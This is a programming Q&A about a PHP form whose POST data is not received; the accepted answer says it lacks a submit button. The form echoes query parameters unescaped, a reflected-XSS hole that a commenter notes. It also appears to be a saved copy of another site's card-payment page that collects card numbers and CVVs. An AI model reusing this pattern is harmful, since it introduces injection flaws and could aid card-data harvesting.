# Php Post does not work

Tags: php, html

I'm starting in php and I came across this problem the post data is not being sent to PHP
After searching a lot on the internet, I could not find a solution. Follow the codes below

Form

```html
<?php

$cnpj = $_GET['cnpj'];
$nc = $_GET['nc'];
$sv = $_GET['sv'];
$_url = "fnc.php?cnpj={$cnpj}&nc={$nc}&sv={$sv}";
?>


<form id="frm" name="frm" action="<?php echo $_url; ?>" method="post">
</table>
<table class="Tabela1" width="610" cellspacing="0" cellpadding="0" border="0" align="center" height="1"><tbody><tr class="TituloTabela1" valign="center"> <td colspan="10" align="center">&nbsp;Dados do cart&atilde;o</td></tr><input name="id_Pedido" id="frm_id_Pedido1" value="7679401" type="HIDDEN">
<input name="chr_NumeroBIN" id="frm_chr_NumeroBIN1" value="485960," type="HIDDEN">
<input name="chr_TipoCartao" id="frm_chr_TipoCartao1" value="visa" type="HIDDEN">
 <tr>  <td><table width="100%" cellspacing="0" cellpadding="0" border="0" height="1"> <tbody><tr class="SubTituloTabela1" valign="center">  <td colspan="10" align="left"></td> </tr><tr height="10"><td></td></tr><tr class="texto2" valign="bottom" height="25">
<td width="1%"></td><td colspan="5" align="Left">N&uacute;mero do Cart&atilde;o*<br><font class="Texto4">(digite apenas n&uacute;meros)</font></td>
<input name="chr_MostrarCVC2" id="frm_chr_MostrarCVC21" value="S" type="HIDDEN">
<td colspan="1" rowspan="1" valign="Top" align="Right">
</td>
<td colspan="1" rowspan="1" valign="Top" align="Right">
</td>
<td colspan="1" rowspan="6" valign="Top" align="Middle">
<div style="width:150px;margin-right:auto;margin-left:auto"><u><b>C&oacute;digo de Seguran&ccedil;a</b></u></div><div style="width:150px;margin-right:auto;margin-left:auto"><img src="recf_ficheiros/CVV_small.JPG" border="0"></div><div style="width:170px;margin-right:auto;margin-left:auto"><font class="Texto4">3 &Uacute;ltimos d&iacute;gitos da faixa num&eacute;rica. <br>(verso do cart&atilde;o)</font></div></td>
</tr><tr class="texto3" valign="top" height="20">
<td width="1%"></td><td colspan="5">

<input class="CaixaTexto" maxlength="16" name="chr_NumeroCartao" id="frm_chr_NumeroCartao1" size="17" autocomplete="off" type="Text"></td>
</tr>
<tr class="texto2" valign="bottom" height="25">
<td width="1%"></td><td colspan="3" align="Left">C&oacute;digo de Seguran&ccedil;a*<br><font class="Texto4">(digite apenas n&uacute;meros)</font></td>
</tr><tr class="texto3" valign="top" height="20">
<td width="1%"></td><td colspan="3">
<input class="CaixaTexto" maxlength="3" name="chr_CVC2" id="frm_chr_CVC21" size="3" autocomplete="off" type="Text"></td>
</tr>
<tr class="texto2" valign="bottom" height="25">
<td width="1%"></td><td colspan="4" align="Left">M&ecirc;s de validade*</td>
<td width="1%"></td><td colspan="2" align="Left">Ano de validade*</td>
</tr><tr class="texto3" valign="top" height="20">
<td width="1%"></td><td colspan="4"><select class="CaixaTexto" name="int_MesCartao" id="frm_int_MesCartao1"> 
<option value="" selected="selected">Selecione...
</option><option value="01">01
</option><option value="02">02
</option><option value="03">03
</option><option value="04">04
</option><option value="05">05
</option><option value="06">06
</option><option value="07">07
</option><option value="08">08
</option><option value="09">09
</option><option value="10">10
</option><option value="11">11
</option><option value="12">12
 </option></select></td><td width="1%"></td><td colspan="2"><select class="CaixaTexto" name="int_AnoCartao" id="frm_int_AnoCartao1"> 
<option value="" selected="selected">Selecione...
</option><option value="2017">2017
</option><option value="2018">2018
</option><option value="2019">2019
</option><option value="2020">2020
</option><option value="2021">2021
</option><option value="2022">2022
</option><option value="2023">2023
</option><option value="2024">2024
</option><option value="2025">2025
</option><option value="2026">2026
</option><option value="2027">2027
 </option></select></td></tr>
</tbody></table></td></tr>
<tr><td height="1"></td></tr>

</tbody></table>
<table width="610" cellspacing="0" cellpadding="0" border="0" align="center" height="1"><tbody><tr><td align="right" height="5"><font class="Texto4">* Campos de preenchimento obrigat&oacute;rio.</font></td></tr>
<tr><td height="15"></td></tr></tbody></table>

<table width="610" cellspacing="0" cellpadding="0" border="0" align="center" height="1"> <tbody>
<tr>

<td width="33%" align="center" height="25">
<table width="1" cellspacing="0" cellpadding="0" border="0">
 <tbody>
  <tr aling="center"> 
   <td width="3">
    <img src="recf_ficheiros/img_dot_002.gif" width="3" height="1"></td> 
    <td width="30" bgcolor="#174529" height="25">
      <a href="#" title="" onclick="">
       <img src="recf_ficheiros/img_botao_fnz_002.gif" width="30" border="0" height="25"></a>
      </td> 
      <td height="25">  
       <table cellspacing="0" cellpadding="0" border="0" height="25">
          <tbody><tr>    
           
               <a href="<?php echo $_url; ?>" id="btn_confirmar" title="" onclick="submitForm();" style="COLOR:#174529; FONT-SIZE: 11px; FONT-FAMILY: Verdana, Arial; font-weight: bold; text-decoration: none;">Finalizar&nbsp;</a></td>      </tr>   <tr bgcolor="#174529">    <td colspan="3" height="1"><img src="recf_ficheiros/img_dot_002.gif" width="1" height="1"></td>   </tr>   <tr>    <td colspan="3" height="4"><img src="recf_ficheiros/img_dot_002.gif" width="1" height="1"></td>   </tr>  </tbody></table> </td> <td width="3"><img src="recf_ficheiros/img_dot_002.gif" width="3" height="1"></td></tr></tbody></table><table width="1" cellspacing="0" cellpadding="0" border="0"></table></td>



</tr>
</tbody></table>

</form>
```

PHP Receiv Post

```
<?php 

$cnpj = $_GET['cnpj'];
$cc = $_POST['chr_NumeroCartao'];
$mes = $_POST['int_MesCartao'];
$ano = $_POST['int_AnoCartao'];
$cvv =  $_POST['chr_CVC2'];

?>
```

OBS: The problem and only in this form I have other pages using post that working perfectly

Comment: What does the developer console show as transmitted form data? You are open to XSS  injections.

Comment: Please consider reforming your question by removing unnecessary code, and rephrasing it. Also, don't forget to include some of your efforts in order to explain you better what you're doing wrong. Generally, it's a good practice to strip your code down to the absolutely necessary and check the functionality of this. Then you can gradually scale it up until you find the issue that causes the problem.

Answer (score 1, accepted):

I think you need specified in HTML a submit button for form:

```
<input type="submit" value="Submit">
```

Comment: It worked thanks but I have one more question I would have to do it with <a> tag